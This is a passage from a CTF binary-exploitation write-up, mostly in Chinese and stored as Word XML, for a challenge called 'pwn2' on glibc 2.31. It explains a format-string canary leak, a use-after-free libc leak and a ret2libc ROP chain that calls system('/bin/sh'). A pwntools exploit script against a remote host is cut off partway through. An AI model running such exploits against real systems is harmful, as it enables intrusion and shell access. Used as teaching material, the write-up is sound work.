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-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basic Info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary: pwn2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Libc: libc-2.31.so</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote: 39.96.193.120:10006</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA256(pwn2): eab320cc6a1a057ef5553326a551d05c86f9c88324b908faa3e4451b8fbb48fd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Arch: amd64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RELRO: Full RELRO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Canary: enabled</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NX: enabled</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE: enabled</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Stripped: no</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="13" w:name="header-n5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="header-n6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泄露</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在程序刚运行并要求用户输入名称时，其核心处理逻辑大概为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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尽管此处限制了用户的输入长度（至多只能输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个有效字符），但这依然满足我们注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%7$p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的条件。经过调试确认，栈上第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个参数刚好存放着当前函数的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数值。借此我们可以提前将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打印出来，以便在后续触发栈溢出时将其填回原位，从而绕过安全校验。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泄露</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Libc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">forge_slingring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">功能时，程序会申请大小为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x84</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内存块（实际分配的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尺寸为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。而在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">discard_slingring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数执行清理操作时，仅仅调用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free(rings[idx])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，却遗漏了对全局数组内对应指针的清零操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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]);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// rings[idx] is still dangling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随后，若调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">show_slingrings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，程序仍会通过这个悬垂指针（dangling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pointer）输出其指向的内存数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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"Ring Slot #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 | [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]   |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rings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]-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dest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具体的利用步骤设计如下：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连续创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个尺寸为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x90</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk。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先释放前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7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chunk，以此将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链表填满。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接着释放第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个（即索引为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的）chunk，使其顺利进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unsorted bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之中。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执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">功能查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> slot 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的信息，此时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式符便会把已释放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指针（包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的相关地址）打印出来。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glibc 2.31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本，unsorted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指针与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基址之间存在固定的距离，即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">libc_base + 0x1ecbe0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。根据这一特性可以得出：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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unsorted_fd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0x1ecbe0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n27"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈溢出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ret2libc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">use_slingring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数可以发现一个非常直接的栈溢出缺陷：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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40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fgets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stdin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观察该函数的栈空间结构可知，从输入缓冲区到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所在位置的距离是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节，紧随其后的便是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> saved rbp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与返回地址（return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">address）。得益于我们在第一步已经掌握了正确的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">canary，所以能够部署如下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"A" * 0x38</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">canary</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"B" * 8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pop rdi; ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合题目提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">libc-2.31.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库文件，提取相应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与函数符号：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret: 0x22679</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pop rdi; ret: 0x23b6a</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system: libc.sym["system"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"/bin/sh": next(libc.search(b"/bin/sh\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链的执行后，即可成功弹出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n35"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit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pwn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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.clear(arch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"amd64"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context.log_level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"info"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST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"39.96.193.120"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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10006</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">elf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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"./pwn2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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libc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ELF(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"./libc-2.31.so"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, checksec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On glibc 2.31, the unsorted-bin fd for this chunk points into main_arena.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UNSORTED_FD_OFF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0x1ECBE0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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0x22679</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POP_RDI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0x23B6A</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BIN_SH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next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(libc.search(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"/bin/sh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start():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remote(HOST, PORT)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menu(p, choice):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b"What do you want to do today?"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b"&gt;&gt;"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(choice).encode())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forge(p, idx, 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, amount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menu(p,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b"(0-9)"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b"Enter destination location:"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p.sendline(dest)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b"(1-9):"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(amount).encode())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b"Press ENTER to return."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discard(p, idx):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    menu(p,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b"discard?"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(idx).encode())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show(p):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    menu(p,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p.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"Press ENTER to return."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leak_canary(p):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b"What is your name?"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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"%7$p"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b"Hello,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(p.recvline().strip(),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leak_libc_base(p):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forge(p, i, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes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0x41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i]),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discard(p, i)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    discard(p,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show(p)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b"Ring Slot #7  | ["</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   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data.find(marker)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"slot 7 leak marker not found"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data[pos : data.find(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"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pos)]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    leak_part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line.split(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"]   | 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unsorted_fd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u64(leak_part[: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].ljust(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b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00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"unsorted fd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unsorted_fd)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unsorted_fd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UNSORTED_FD_OFF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exploit():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start()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    canary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leak_canary(p)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"canary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canary)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    libc_base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leak_libc_base(p)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"libc base = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
